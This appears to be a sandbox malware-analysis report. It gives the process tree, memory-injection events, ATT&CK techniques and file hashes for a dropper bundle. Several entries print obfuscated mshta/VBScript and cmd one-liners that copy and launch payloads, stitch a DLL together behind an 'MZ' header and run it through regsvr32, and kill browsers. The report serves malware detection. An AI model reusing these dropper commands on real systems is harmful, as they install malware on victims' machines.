2984	IEXPLORE.EXE
2984	IEXPLORE.EXE
736	iexplore.exe
736	iexplore.exe
2984	IEXPLORE.EXE
2984	IEXPLORE.EXE
2984	IEXPLORE.EXE
2984	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

toolspab2 (20).exe591C.exe

description	pid	process	target process
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 452 wrote to memory of 812	452	toolspab2 (20).exe	toolspab2 (20).exe
PID 1356 wrote to memory of 268	1356		EA30.exe
PID 1356 wrote to memory of 268	1356		EA30.exe
PID 1356 wrote to memory of 268	1356		EA30.exe
PID 1356 wrote to memory of 268	1356		EA30.exe
PID 1356 wrote to memory of 1184	1356		EC91.exe
PID 1356 wrote to memory of 1184	1356		EC91.exe
PID 1356 wrote to memory of 1184	1356		EC91.exe
PID 1356 wrote to memory of 1184	1356		EC91.exe
PID 1356 wrote to memory of 1300	1356		11BE.exe
PID 1356 wrote to memory of 1300	1356		11BE.exe
PID 1356 wrote to memory of 1300	1356		11BE.exe
PID 1356 wrote to memory of 1300	1356		11BE.exe
PID 1356 wrote to memory of 1920	1356		177A.exe
PID 1356 wrote to memory of 1920	1356		177A.exe
PID 1356 wrote to memory of 1920	1356		177A.exe
PID 1356 wrote to memory of 1920	1356		177A.exe
PID 1356 wrote to memory of 1700	1356		591C.exe
PID 1356 wrote to memory of 1700	1356		591C.exe
PID 1356 wrote to memory of 1700	1356		591C.exe
PID 1356 wrote to memory of 1700	1356		591C.exe
PID 1356 wrote to memory of 1176	1356		explorer.exe
PID 1356 wrote to memory of 1176	1356		explorer.exe
PID 1356 wrote to memory of 1176	1356		explorer.exe
PID 1356 wrote to memory of 1176	1356		explorer.exe
PID 1356 wrote to memory of 1176	1356		explorer.exe
PID 1356 wrote to memory of 1620	1356		explorer.exe
PID 1356 wrote to memory of 1620	1356		explorer.exe
PID 1356 wrote to memory of 1620	1356		explorer.exe
PID 1356 wrote to memory of 1620	1356		explorer.exe
PID 1356 wrote to memory of 1188	1356		explorer.exe
PID 1356 wrote to memory of 1188	1356		explorer.exe
PID 1356 wrote to memory of 1188	1356		explorer.exe
PID 1356 wrote to memory of 1188	1356		explorer.exe
PID 1356 wrote to memory of 1188	1356		explorer.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1356 wrote to memory of 1136	1356		explorer.exe
PID 1356 wrote to memory of 1136	1356		explorer.exe
PID 1356 wrote to memory of 1136	1356		explorer.exe
PID 1356 wrote to memory of 1136	1356		explorer.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1700 wrote to memory of 1732	1700	591C.exe	591C.exe
PID 1356 wrote to memory of 1952	1356		explorer.exe
PID 1356 wrote to memory of 1952	1356		explorer.exe
PID 1356 wrote to memory of 1952	1356		explorer.exe
PID 1356 wrote to memory of 1952	1356		explorer.exe
PID 1356 wrote to memory of 1952	1356		explorer.exe
PID 1356 wrote to memory of 1644	1356		explorer.exe
PID 1356 wrote to memory of 1644	1356		explorer.exe
PID 1356 wrote to memory of 1644	1356		explorer.exe
PID 1356 wrote to memory of 1644	1356		explorer.exe
PID 1356 wrote to memory of 1656	1356		explorer.exe

C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:452

C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:812

C:\Users\Admin\AppData\Local\Temp\EA30.exe
C:\Users\Admin\AppData\Local\Temp\EA30.exe
1⤵
- Executes dropped EXE
PID:268

C:\Users\Admin\AppData\Local\Temp\EC91.exe
C:\Users\Admin\AppData\Local\Temp\EC91.exe
1⤵
- Executes dropped EXE
PID:1184

C:\Users\Admin\AppData\Local\Temp\11BE.exe
C:\Users\Admin\AppData\Local\Temp\11BE.exe
1⤵
- Executes dropped EXE
PID:1300

C:\Users\Admin\AppData\Local\Temp\177A.exe
C:\Users\Admin\AppData\Local\Temp\177A.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1920

C:\Users\Admin\AppData\Local\Temp\591C.exe
C:\Users\Admin\AppData\Local\Temp\591C.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Users\Admin\AppData\Local\Temp\591C.exe
C:\Users\Admin\AppData\Local\Temp\591C.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1176

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1620

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1188

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1136

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1952

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1644

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1656

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1948

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:744

C:\Users\Admin\AppData\Local\Temp\F4A1.exe
C:\Users\Admin\AppData\Local\Temp\F4A1.exe
1⤵
- Executes dropped EXE
PID:296

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\F4A1.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\F4A1.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))
2⤵
- Modifies Internet Explorer settings
PID:1232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\F4A1.exe" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\F4A1.exe" ) do taskkill -iM "%~NxE" -f
3⤵
- Loads dropped DLL
PID:1848

C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE
..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS
4⤵
- Executes dropped EXE
PID:1464

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))
5⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f
6⤵
PID:896

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRipt:clOSe (CreATeobJECT ("WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+ M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q * " , 0,TruE ) )
5⤵
- Modifies Internet Explorer settings
PID:1112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2& COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q *
6⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
7⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"
7⤵
PID:452

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /u ..\FRKN5P.zE /S
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:632

C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "F4A1.exe" -f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Users\Admin\AppData\Local\Temp\1AC7.exe
C:\Users\Admin\AppData\Local\Temp\1AC7.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600

C:\Users\Admin\AppData\Local\Temp\is-LN25F.tmp\1AC7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LN25F.tmp\1AC7.tmp" /SL5="$2019E,188175,104448,C:\Users\Admin\AppData\Local\Temp\1AC7.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1072

C:\Users\Admin\AppData\Local\Temp\is-E8URM.tmp\134 Vaporeondè_éçè_)))_.exe
"C:\Users\Admin\AppData\Local\Temp\is-E8URM.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1288

C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe
"C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:892

C:\Users\Admin\AppData\Local\Temp\is-014S7.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-014S7.tmp\irecord.tmp" /SL5="$601BA,5808768,66560,C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1620

C:\Program Files (x86)\i-record\I-Record.exe
"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756

C:\Users\Admin\AppData\Local\Temp\91-1b947-4e9-8a791-47306057df8c1\Sepypitiqy.exe
"C:\Users\Admin\AppData\Local\Temp\91-1b947-4e9-8a791-47306057df8c1\Sepypitiqy.exe"
4⤵
- Executes dropped EXE
PID:2040

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
5⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:736

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:275457 /prefetch:2
6⤵
- Modifies Internet Explorer settings
PID:2144

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:472066 /prefetch:2
6⤵
- Suspicious use of SetWindowsHookEx
PID:2584

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:537607 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1944

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:930826 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2284

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1127443 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2200

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:472117 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2248

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1717267 /prefetch:2
6⤵
PID:1660

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:736 CREDAT:1520678 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2984

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
5⤵
PID:1588

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
5⤵
PID:2668

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
5⤵
PID:2564

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
5⤵
PID:1092

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
5⤵
PID:1832

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
5⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\bb-cc955-0c3-5d7b8-7466f23ae25a7\Mejaelaelolae.exe
"C:\Users\Admin\AppData\Local\Temp\bb-cc955-0c3-5d7b8-7466f23ae25a7\Mejaelaelolae.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gufj4eo.qzc\GcleanerEU.exe /eufive & exit
5⤵
PID:2852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwbpndzj.aas\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:3056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y112kni0.mth\google-game.exe & exit
5⤵
PID:2196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wjaoo53t.eyb\GcleanerWW.exe /mixone & exit
5⤵
PID:2908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe & exit
5⤵
PID:2396

C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1264

C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\msd2ccuo.v2k\toolspab1.exe
7⤵
- Executes dropped EXE
PID:2608

C:\Users\Admin\AppData\Local\Temp\27B3.exe
C:\Users\Admin\AppData\Local\Temp\27B3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Users\Admin\AppData\Local\Temp\27B3.exe
"C:\Users\Admin\AppData\Local\Temp\27B3.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
PID:1196

C:\Users\Admin\AppData\Local\Temp\8187.exe
C:\Users\Admin\AppData\Local\Temp\8187.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2392

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Users\Admin\AppData\Local\Temp\8C32.exe
C:\Users\Admin\AppData\Local\Temp\8C32.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\system32\taskeng.exe
taskeng.exe {2478B2E5-C1DC-4C32-A8C4-6887E54FABE4} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2184

C:\Users\Admin\AppData\Roaming\tjwccub
C:\Users\Admin\AppData\Roaming\tjwccub
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2536

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2224

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2160

C:\Windows\system32\taskeng.exe
taskeng.exe {FF063893-4957-4E2A-A655-4909E619AA1C} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:984

C:\Users\Admin\AppData\Roaming\tjwccub
C:\Users\Admin\AppData\Roaming\tjwccub
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2864

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1592

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3028

C:\Windows\system32\taskeng.exe
taskeng.exe {135C5CF9-04EE-4156-9DEE-F4938DB304C1} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2880

C:\Users\Admin\AppData\Roaming\tjwccub
C:\Users\Admin\AppData\Roaming\tjwccub
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2132

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2280

C:\Users\Admin\AppData\Roaming\htwccub
C:\Users\Admin\AppData\Roaming\htwccub
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2496

C:\Users\Admin\AppData\Local\Temp\E0B9.exe
C:\Users\Admin\AppData\Local\Temp\E0B9.exe
1⤵
- Executes dropped EXE
PID:2840

C:\Users\Admin\AppData\Local\Temp\E230.exe
C:\Users\Admin\AppData\Local\Temp\E230.exe
1⤵
- Executes dropped EXE
PID:2936

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll"). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\E230.exe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if """" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\E230.exe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE))
2⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\E230.exe" > 0~NM~WIL.eXe&&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "" =="" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\E230.exe" ) do taskkill -F /IM "%~NXD"
3⤵
- Loads dropped DLL
PID:2544

C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe
0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4
4⤵
- Executes dropped EXE
PID:2632

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCripT: CLOsE ( cReATEoBJeCT ("wSCRipT.shEll"). RUN ( "cmd /C tYPE ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" > 0~NM~WIL.eXe && sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if ""/pwIz2i2S0CJRBKmE4 "" == """" for %D iN ( ""C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe"" ) do taskkill -F /IM ""%~NXD"" " , 0 , TRUE))
5⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" > 0~NM~WIL.eXe&&sTaRT 0~nM~WIl.eXE /pwIz2i2S0CJRBKmE4 & if "/pwIz2i2S0CJRBKmE4 " =="" for %D iN ( "C:\Users\Admin\AppData\Local\Temp\0~NM~WIL.eXe" ) do taskkill -F /IM "%~NXD"
6⤵
PID:960

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRiPT:CLosE ( cREATEObjECt( "WsCrIpT.ShElL" ). RUn ( "CmD /q /C EchO 90tQ%daTe%PSA> YAEF9Fv.MI & ECHo | seT /p = ""MZ"" > s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 + 1LIRC.u + SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u " ,0, TRue) )
5⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C EchO 90tQÚTe%PSA> YAEF9Fv.MI & ECHo | seT /p = "MZ" >s1S8NN.3F & CoPY /Y /B S1S8Nn.3f + RVPZHO1.qP + 4ZlR0MZ.q_1 +1LIRC.u +SWnWL.H +YAEF9FV.MI XN9IOnS.vc &sTART regsvr32.exe -s XN9IONS.VC /u
6⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHo "
7⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>s1S8NN.3F"
7⤵
PID:1484

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe -s XN9IONS.VC /u
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:856

C:\Windows\SysWOW64\taskkill.exe
taskkill -F /IM "E230.exe"
4⤵
- Kills process with taskkill
PID:2464

C:\Users\Admin\AppData\Local\Temp\E618.exe
C:\Users\Admin\AppData\Local\Temp\E618.exe
1⤵
- Executes dropped EXE
PID:2488

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll
MD5
5f60669a79e4c4285325284ab662a0c0

SHA1
5b83f8f2799394df3751799605e9292b21b78504

SHA256
3f6aa370d70259dc55241950d669d2bf3dc7b57a0c45c6a2f8dec0d8c8cc35b0

SHA512
6ec9fe576daa4fde11a39a929dd23ab44297521c4d23352af1a78716cc3ec7927aa6949d5f7af638148e58e5b6d1d16043ad1a7b0dabb8103acc07d0d4c8a42f

Download Submit
C:\Program Files (x86)\i-record\I-Record.exe
MD5
13c3ba689a19b325a19ab62cbe4c313c

SHA1
8b0ba8fc4eab09e5aa958699411479a1ce201a18

SHA256
696822fcdd3382ba02dfcce45ec4784d65ef44adf7d1fac2520b81f8ce007cf9

SHA512
387095ec1ccfd7f4e2dac8522fd72b3199447ad750133bf3719810952262321845f6590457ab4c950f5cf9c5fda93377710e7b8d940b04d6c80252f1ccf8033e

Download Submit
C:\Program Files (x86)\i-record\I-Record.exe
MD5
13c3ba689a19b325a19ab62cbe4c313c

SHA1
8b0ba8fc4eab09e5aa958699411479a1ce201a18

SHA256
696822fcdd3382ba02dfcce45ec4784d65ef44adf7d1fac2520b81f8ce007cf9

SHA512
387095ec1ccfd7f4e2dac8522fd72b3199447ad750133bf3719810952262321845f6590457ab4c950f5cf9c5fda93377710e7b8d940b04d6c80252f1ccf8033e

Download Submit
C:\Program Files (x86)\i-record\I-Record.exe.config
MD5
871947926c323ad2f2148248d9a46837

SHA1
0a70fe7442e14ecfadd2932c2fb46b8ddc04ba7a

SHA256
f3d7125a0e0f61c215f80b1d25e66c83cd20ed3166790348a53e0b7faf52550e

SHA512
58d9687495c839914d3aa6ae16677f43a0fa9a415dbd8336b0fcacd0c741724867b27d62a640c09828b902c69ac8f5d71c64cdadf87199e7637681a5b87da3b7

Download Submit
C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe
MD5
f3e69396bfcb70ee59a828705593171a

SHA1
d4df6a67e0f7af5385613256dbf485e1f2886c55

SHA256
c970b8146afbd7347f5488fd821ae6ade4f355dcb29d764b7834ce8a1754105f

SHA512
4743b9bf562c1b8616f794493123160de95ba15451affacf286aff6d2af023a07d7942a8753c3fdccf8d294f99b46adee8ac58f6a29d42dea973a9de6a77d22f

Download Submit
C:\Program Files\7-Zip\OCEKORKVLM\irecord.exe
MD5
f3e69396bfcb70ee59a828705593171a

SHA1
d4df6a67e0f7af5385613256dbf485e1f2886c55

SHA256
c970b8146afbd7347f5488fd821ae6ade4f355dcb29d764b7834ce8a1754105f

SHA512
4743b9bf562c1b8616f794493123160de95ba15451affacf286aff6d2af023a07d7942a8753c3fdccf8d294f99b46adee8ac58f6a29d42dea973a9de6a77d22f

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\i-record.lnk
MD5
e96909d98b966c99f2109dbf70c165de

SHA1
6c4c3778d29fc594935c66cfc1f1a6cd4b0fff80

SHA256
929591b6e1808ec449c81dbbc04d50455f0ad026b066770a19c5706358668f9f

SHA512
